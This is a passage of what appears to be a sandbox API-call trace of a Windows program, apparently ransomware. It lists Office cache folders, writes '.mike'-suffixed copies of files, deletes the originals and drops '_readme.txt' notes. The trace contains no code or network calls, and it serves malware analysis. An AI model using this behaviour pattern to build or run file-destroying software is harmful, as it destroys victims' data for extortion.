Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", dwFileAttributes=0x80) returned 1 [0040.334] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.334] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 1 [0040.334] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0040.335] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0040.335] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.335] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\_readme.txt", lpFilePart=0x0) returned 0x53 [0040.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af068) returned 1 [0040.335] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.335] GetFileType (hFile=0x264) returned 0x1 [0040.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af064) returned 1 [0040.336] GetFileType (hFile=0x264) returned 0x1 [0040.336] WriteFile (in: hFile=0x264, lpBuffer=0x22c39d0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x22c39d0*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0040.337] CloseHandle (hObject=0x264) returned 1 [0040.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0040.337] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpFilePart=0x0) returned 0x47 [0040.337] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", lpFilePart=0x0) returned 0x48 [0040.337] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe23ee260, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe23ee260, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.337] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe23ee260, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe23ee260, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.337] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0040.337] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2e3b660, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd8400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0040.338] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe237be40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe237be40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe23ee260, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml.mike", cAlternateFileName="PROOFX~1.MIK")) returned 1 [0040.338] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe23ee260, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe23ee260, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe23ee260, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0040.338] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe23ee260, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe23ee260, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe23ee260, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0040.338] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0040.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0040.338] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.338] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0040.338] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0040.338] CoTaskMemFree (pv=0x4fe370) [0040.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0040.339] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.339] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.339] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.339] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.376] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.376] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0040.376] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0040.376] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1 [0040.377] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0040.380] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.380] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.380] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi", lpFilePart=0x0) returned 0x4e [0040.381] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.381] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.381] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.381] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.382] GetFileType (hFile=0x264) returned 0x1 [0040.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.382] GetFileType (hFile=0x264) returned 0x1 [0040.382] CloseHandle (hObject=0x264) returned 1 [0040.382] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.382] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.382] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.382] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.382] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), fInfoLevelId=0x0, lpFileInformation=0x20dc4cc | out: lpFileInformation=0x20dc4cc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567)) returned 1 [0040.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.382] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.382] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), fInfoLevelId=0x0, lpFileInformation=0x20dc80c | out: lpFileInformation=0x20dc80c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567)) returned 1 [0040.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.383] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.383] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.383] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.383] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.383] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.383] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.383] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.383] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.383] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.384] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.384] GetFileType (hFile=0x264) returned 0x1 [0040.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.384] GetFileType (hFile=0x264) returned 0x1 [0040.384] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.384] WriteFile (in: hFile=0x264, lpBuffer=0x20dd76c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x20dd76c*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.385] CloseHandle (hObject=0x264) returned 1 [0040.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.385] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), fInfoLevelId=0x0, lpFileInformation=0x20dd238 | out: lpFileInformation=0x20dd238*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567)) returned 1 [0040.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.385] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.385] SetThreadErrorMode 